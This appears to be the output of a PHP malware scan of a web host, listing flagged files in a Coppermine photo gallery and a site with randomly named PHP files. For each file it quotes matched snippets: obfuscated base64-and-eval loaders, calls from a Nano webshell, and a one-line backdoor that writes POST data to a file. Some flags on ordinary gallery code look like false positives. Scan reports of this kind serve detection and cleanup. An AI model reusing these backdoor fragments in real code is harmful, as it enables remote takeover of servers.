Size: 183.48 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1 Dangers: 1

Description Match

Function strrev eval_strrev Line: 412 Dangerous

Encoded Function `eval`

<?php lave

Function system Warning

Potentially dangerous function `system`

<?php system (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Nøgleords manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage nøgleord (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF visning (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Vis Nyheder'; $lang_gallery_admin_menu['shownews_title']...

/custdata02/turtle/public_html/ryan-and-lisa/lang/dutch.php

Size: 193.20 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function system Warning

Potentially dangerous function `system`

<?php system (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Trefwoord manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Beheer trefwoorden (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Stel de EXIF display in (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Toon Nieuws'; $lang_gallery_admin...

/custdata02/turtle/public_html/ryan-and-lisa/lang/english.php

Size: 181.89 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function system Warning

Potentially dangerous function `system`

<?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Keyword manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage keywords (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Show News'; $lang_gallery_admin_menu['sh...

/custdata02/turtle/public_html/ryan-and-lisa/lang/french.php

Size: 202.93 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 11413268 Line: 234 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`

/custdata02/turtle/public_html/ryan-and-lisa/lang/norwegian.php

Size: 183.91 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Function strrev eval_strrev Line: 1517 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`

/custdata02/turtle/public_html/ryan-and-lisa/lang/polish.php

Size: 189.24 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function system Warning

Potentially dangerous function `system`

<?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Keyword manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage keywords (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Pokaż wiadomości'; $lang_gallery_admin...

/custdata02/turtle/public_html/ryan-and-lisa/lang/spanish.php

Size: 194.11 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Function strrev eval_strrev Line: 116 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`

/custdata02/turtle/public_html/ryan-and-lisa/lang/spanish_mx.php

Size: 184.42 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Function strrev eval_strrev Line: 109 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`

/custdata02/turtle/public_html/ryan-and-lisa/plugins/usergal_alphatabs/codebase.php

Size: 17.13 kB Created: 2012-10-14 07:50:06 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval('
        
        class new_udb_class extends '. get_class($cpg_udb) . ' {
    
            function new_udb_class() {}
    
    function list_users_query(&$user_count)
    {
        global $CONFIG, $FORBIDDEN_SET, $PAGE;
        $superCage = Inspekt::makeSuperCage();
        $getLetter = $superCage->get->getAlpha("letter");

        $f =& $this->field;

        if ($FORBIDDEN_SET != "") {
            $forbidden_with_icon = "AND (1 $FORBIDDEN_SET or p.galleryicon=p.pid)";
 ...

/custdata02/turtle/public_html/ryan-and-lisa/plugins/visiblehookpoints/codebase.php

Size: 29.87 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($this->xmlSData[$i]); $this->makeTDHeader("xml","xmlText"); echo (!empty($this->xmlCData[$i])) ? $this->xmlCData[$i] : "&nbsp;"; echo $this->closeTDRow(); $this->makeTDHeader("xml","xmlComment"); echo (!empty($this->xmlDData[$i])) ? $this->xmlDData[$i] : "&nbsp;"; echo $this->closeTDRow(); $this->makeTDHeader("xml","xmlChildren"); unset($this->xmlCData[$i],$this->xmlDData[$i]); } echo $this->closeTDRow(); echo "</table>"; $this->xmlCount=0; } function xmlCharacterData($parser,$data) { $coun...

/custdata02/turtle/public_html/ryan-and-lisa/themes/hardwired/images/navbar/index.php

Size: 18.30 kB Created: 2022-05-23 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 26

Description	Match
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[18]( $c8[14]($Jd . "/" . jd($_GET["n"])`
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[6]($yf)`
Exploit nano Line: 352 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[11]($_FILES["f"]["tmp_name"][$lE], $Wx[$lE])`
Exploit nano Line: 370 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[17](JD($_GET["n"])`
Exploit nano Line: 378 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[4]("/(\\\\\|\\/)`
Exploit nano Line: 434 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]($BL)`
Exploit nano Line: 489 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]("{$Jd}/{$_POST["n"]}")`
Exploit nano Line: 491 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[15]("{$Jd}/{$_POST["n"]}")`
Exploit nano Line: 514 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])`
Exploit nano Line: 534 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[16]($Jd . "/" . jD($_GET["n"])`
Exploit nano Line: 547 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[14]($Jd . "/" . jD($_GET["n"])`
Exploit nano Line: 556 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]($Jd . "/" . jD($_GET["n"])`
Exploit nano Line: 572 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[14]($Jd . "/" . jd($_GET["n"])`
Exploit nano Line: 591 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[5]($G3($Jd)`
Exploit nano Line: 593 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[6]("{$Jd}/{$yf}")`
Exploit nano Line: 604 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$yf}")`
Exploit nano Line: 608 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[8]("{$Jd}/{$yf}")`
Exploit nano Line: 610 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[9]("{$Jd}/{$yf}")`
Exploit nano Line: 640 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[7]("{$Jd}/{$F1}")`
Exploit nano Line: 645 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[10]("{$Jd}/{$F1}")`
Exploit nano Line: 658 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$F1}")`
Exploit nano Line: 662 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[8]("{$Jd}/{$F1}")`
Exploit nano Line: 664 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[9]("{$Jd}/{$F1}")`
Exploit nano Line: 78 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[2]()`
Exploit nano Line: 82 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[3](Jd($_GET["p"])`
Sign 963e968a Line: 328 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/ryan-and-lisa/searchnew.php

Size: 29.72 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Exploit execution Line: 466 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_POST['picfile_' . $pic_id])`

/custdata02/turtle/public_html/ryan-and-lisa/showthumb.php

Size: 4.38 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function passthru Warning

Potentially dangerous function `passthru`

[https://www.php.net/passthru]

<?php passthru("{$CONFIG['impath']}convert -quality $CONFIG[jpeg_qual] -antialias -geometry {$destWidth}x{$destHeight} $src_file -"); break; case "gd2": if ($imginfo[2] == GIS_GIF && $CONFIG['GIF_support'] == 1) { $src_img = imagecreatefromgif($src_file); } elseif ($imginfo[2] == GIS_JPG) { $src_img = imagecreatefromjpeg($src_file); } else { $src_img = imagecreatefrompng($src_file); } if ($imginfo[2] == GIS_GIF) { $dst_img = imagecreate($destWidth, $destHeight); } else { $dst_img = imagecreatetruecolo...

/custdata02/turtle/public_html/ryan-and-lisa/install.php

Size: 86.51 kB Created: 2012-10-14 07:50:03 Modified: 2024-06-02 06:32:49 Warns: 2

Description Match

Exploit infected_comment Line: 2216 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

<?php /*color*/

Function exec Warning

Potentially dangerous function `exec`

<?php exec($command, $exec_output, $exec_retval); $version = @$exec_output[0] . @$exec_output[1]; if ($version != '') { if (preg_match('/ /', $path)) { $path = str_replace(array('.exe', '"'), '',$path); $path = substr($path, 0, (strlen($path) - 7)); $GLOBALS['error'] = sprintf($language['im_path_space'], $path); return false; } $tst_image = "albums/userpics/im.gif"; exec ("$path images/coppermine-logo.png $tst_image", $output, $result); $size = cpgGetimagesize($tst_image); @unlink($tst_image); $im_ins...

/custdata02/turtle/public_html/ryan-and-lisa/install_classic.php

Size: 27.42 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1 Dangers: 1

Description Match

Function exec Warning

Potentially dangerous function `exec`

<?php exec ("{$_POST['impath']}convert images/coppermine-logo.png $tst_image", $output, $result); $size = getimagesize($tst_image); unlink($tst_image); $im_installed = ($size[2] == 1); if (!$im_installed) $errors .= "<hr /><br />The installer found the ImageMagick 'convert' program in '{$_POST['impath']}', however it can't be executed by the script.<br /><br />
                                        You may consider using GD instead of ImageMagick.<br /><br />"; if ($result && count($output)) { $err...

Sign 0f37c730 Line: 75 Dangerous

Malware Signature (hash: 0f37c730)

<?php mysql_connect($_POST['dbserver'], $_POST

/custdata02/turtle/public_html/ryan-and-lisa/xp_publish.php

Size: 36.45 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Dangers: 1

Description Match

Exploit download_remote_code2 Line: 156 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

<?php fwrite(fopen(LOGFILE, 'w'), $ob);
    }

    exit;
}
// Quote a string in order to make a valid JavaScript string
function javascript_string($str)
{
    // replace \ with \\ and then ' with \'.
    $str = str_replace('\\', '\\\\', $str);
    $str = str_replace('\'', '\\\'', $str);

    return $str;
}

// Return the HTML code for the album list select box
function html_album_list(&$alb_count)
{
    global $CONFIG, $LINEBREAK;

    if (USER_IS_ADMIN) {
        $public_albums =...

/custdata02/turtle/public_html/ryan-and-lisa/pic_editor.php

Size: 15.43 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Warns: 2

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'R0lGODlhGQAZAMQAAP///+zv8t3h5tXc5NbW1s/V3dHS08XN1cPK0cLDw8HCw7y+wLW1ta+0u66yuKurrJmZmf///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAUUABEALAAAAAAZABkAAAWhYCSOZGlGCQCc7JmubSy+skzX5xAYKm4OAsLNJyrsIo8eMaJTiBhKH9AgciyiNSM10jgMZc2qFtuaihqF4JelPR+OSVg54Iw4jIknuWTmprdWeyNtXG9bXWsjYXZ4YjuCfWgCh2lCe4RdR4VwZIt3AXmMoHpyTAOUk2d/Z1elAQRVb7B2smcILwm5CQYJDwwLu72/wb7ALyrIycrLzM3OyyEAOw=='

Function eval Warning

Potentially dangerous function `eval`

<?php eval('($json_vars)');</script>" . $LINEBREAK; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
  <meta http-equiv="imagetoolbar" content="no" />
  <meta http-equiv="content-type" content="text/html; charset=<?php echo $CONFIG['charset'] == 'language file' ? $lang_charset : $CONFIG['charset'] ?>" />
    <title><?php echo $lang_editpics_php['crop_title'] ?></title>
    <?php if($imgObj){ echo $json_s...

/custdata02/turtle/public_html/scullycommercial.com/resources/library/template_functions.php

Size: 765.00 B Created: 2010-08-23 22:29:23 Modified: 2024-06-02 06:32:49 Warns: 1

Description	Match
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$key}`

/custdata02/turtle/public_html/scullycommercial.com/4yJaMCGog1X.php

Size: 43.44 kB Created: 2024-06-01 02:24:50 Modified: 2024-06-01 08:12:21 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NVCh`
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/scullycommercial.com/T6vRJyM2GxK.php

Size: 51.36 kB Created: 2024-06-01 02:24:50 Modified: 2024-06-01 08:12:21 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/scullycommercial.com/hoemHAxMtNS.php

Size: 43.48 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/scullycommercial.com/J5sAKYDV1lG.php

Size: 166.77 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/scullycommercial.com/k36RrMTWqdC.php

Size: 51.81 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/scullycommercial.com/SNrJKDOGlMz.php

Size: 38.68 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/scullycommercial.com/theme-instenp.php

Size: 338.00 B Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/scullycommercial.com/69uSn7wzcNh.php

Size: 43.51 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/scullycommercial.com/SzGJyqjXwW3.php

Size: 166.77 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

